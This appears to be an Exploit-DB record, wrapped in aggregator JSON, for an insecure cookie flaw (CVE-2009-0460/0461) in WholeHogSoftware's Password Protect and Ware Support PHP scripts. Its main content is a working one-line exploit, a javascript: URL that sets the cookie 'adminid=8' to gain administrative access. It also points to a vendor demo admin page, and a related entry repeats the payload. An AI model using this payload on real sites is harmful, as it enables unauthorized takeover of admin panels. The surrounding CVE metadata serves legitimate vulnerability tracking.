ID EDB-ID:7952
Type exploitdb
Reporter Stack
Modified 2009-02-03T00:00:00
Description
WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform
###########################################################################
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
[+] Script :Password Protect
[+] Site :http://wholehogsoftware.com
[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin
# milw0rm.com [2009-02-03]
{"id": "EDB-ID:7952", "hash": "d493892e50ce6e2b3daf04bcff285c71", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln", "description": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "published": "2009-02-03T00:00:00", "modified": "2009-02-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7952/", "reporter": "Stack", "references": [], "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "lastseen": "2016-02-01T03:24:46", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "vulnersScore": 10.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7952/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability\n[+] Script :Password Protect\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/password_protect_enhanced/admin\n\n# milw0rm.com [2009-02-03]\n", "osvdbidlist": ["51734"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-19T11:13:31", "references": ["https://www.exploit-db.com/exploits/7952", "http://www.securityfocus.com/bid/33577"], "description": "Whole Hog Password Protect: Enhanced 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 2, "reporter": "NVD", "published": "2009-02-10T02:00:24", "title": "CVE-2009-0461", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:13:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-0461"], "scanner": [], "modified": "2017-10-18T21:30:18", "cpe": ["cpe:/a:wholehogsoftware:password_protect:1.0"], "id": "CVE-2009-0461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0461", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-19T11:13:31", "references": ["http://www.securityfocus.com/bid/33577", "https://www.exploit-db.com/exploits/7951"], "description": "Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 2, "reporter": "NVD", "published": "2009-02-10T02:00:24", "title": "CVE-2009-0460", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:13:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-0460"], "scanner": [], "modified": "2017-10-18T21:30:17", "cpe": ["cpe:/a:wholehogsoftware:ware_support:1.0"], "id": "CVE-2009-0460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0460", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T03:24:37", "osvdbidlist": ["51734"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "reporter": "Stack", "published": "2009-02-03T00:00:00", "type": "exploitdb", "title": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-02-03T00:00:00", "id": "EDB-ID:7951", "href": "https://www.exploit-db.com/exploits/7951/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability\n[+] Script :Ware Support\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://wholehogsoftware.com/index.php/page/ware_support\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/support/admin/\n\n# milw0rm.com [2009-02-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7951/"}]}
